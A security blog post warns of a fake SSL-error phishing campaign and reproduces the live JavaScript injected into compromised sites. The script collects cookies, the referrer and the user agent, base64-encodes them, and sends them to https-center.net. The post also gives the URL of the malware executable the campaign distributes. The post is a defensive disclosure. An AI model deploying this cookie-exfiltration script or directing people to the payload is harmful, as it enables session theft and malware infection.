SSL Error message JavaScript Attack.
HTTPS is most common way to secure website.
In the last few months, I was working to check the different SSL Error messages that different browsers like Chrome and Firefox display when users try to access the website. I am thankful to badssl.com for helping me to learn something useful for SSL Based Error message. I have learnt a lot. I was checking different domains that are available to purchase or book. I have been searching for different domains.
Non Popular TLDs are used to book domains.
I have been checking domains with different TLDs that are being purchased. I have found a couple of domains are used to do phishing attack in the name of HTTP and HTTPS. I visited one such domain that has a website hosted and used for a phishing attack.
While checking websites, I have found that they are completely forged and can hack your computer. They are using this kind of website to do phishing attacks. Users are not aware that they are downloading the Virus instead of some program that would help them to fix the problem.
Generally, the user would click the link that would help them download the software, and if the software were accidentally executed, it would harm the computer after Software Installation can lead to installing Malware that would be harmful Trojan Horse Virus or can be used in Ransomware Attack.
The website that I come across is named https-center.net. Following are whois information URL and screenshot:
https://www.whois.com/whois/https-center.net
Javascript that could be used to plant virus in your computer.
The hacker get control of to one of the website and upload following javascript in the website that would redirect the traffic and make sure that users would see the error message and they download the malicious code that would harm their computer.
function listCookies() { var theCookies = document.cookie.split(';'); var aString = ''; for (var i = 1 ; i <= theCookies.length; i++) { aString += i + ' ' + theCookies[i-1] + "\n"; } return aString;}var jspp22 = document.createElement('script');jspp22.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + 'https-center.net/jquery.js?&up=TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4zOyBXaW42NDsgeDY0OyBydjo4Ni4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94Lzg2LjA=&ts=MTYxODk0ODk5NC4wNjAz&r=' + btoa(document.referrer) + '&u=' + btoa(navigator.userAgent) + '&c=' + btoa(listCookies());document.getElementsByTagName("html")[0].appendChild(jspp22);
Here are a few screenshots of how the page looks like in Firefox and Chrome.
Once you Click On Update Recommendation. It will ask you to Download EXE (HTTPS_pfx_update.06_2021.exe). The Executable would be downloaded from foralison.org. Following are the exact URL where Virus led executable will be downloaded:
https://foralison.org/library/HTTPS_pfx_update.06_2021.exe
I have checked the URL with Virus Total, but it does not find it as a virus. You can check the following URL for Virus total result:
When I uploaded the file to Virus total, it detected Exe as a Virus. Here is another URL:
As you see in this URL, the virus total could not find this Executable as Virus, but believe me, this is a virus that would be harmful. The Executable is Signed, so it would sometimes bypass Virus Security, and you might execute it and install Malware in your computer.
You can see a virus detected by some of the Anti-Virus scanners that would help you prevent any harm to your personal and corporates computers.
I would suggest being aware of this kind of fraud attack and ensuring that your Anti-Virus and updates would help you prevent this kind of attack. I am analyzing the exe right now, and I might come with another blog with what I found in Executables and what kind of damage it does to any system.
18 Years Experienced Professional in Cryptography, PKI, Information Security, Data Security, SSL Certificate, TLS Certificate, Cloud Security, Website Security, Email Security, Cloud HSM, IT Infrastructure Management, Cloud Management and Customer Support. Certified in Comptia Security+, EC Council CEHv10, MCSE, ITILv3. Domain Investor by Hobby owns 150+ domains.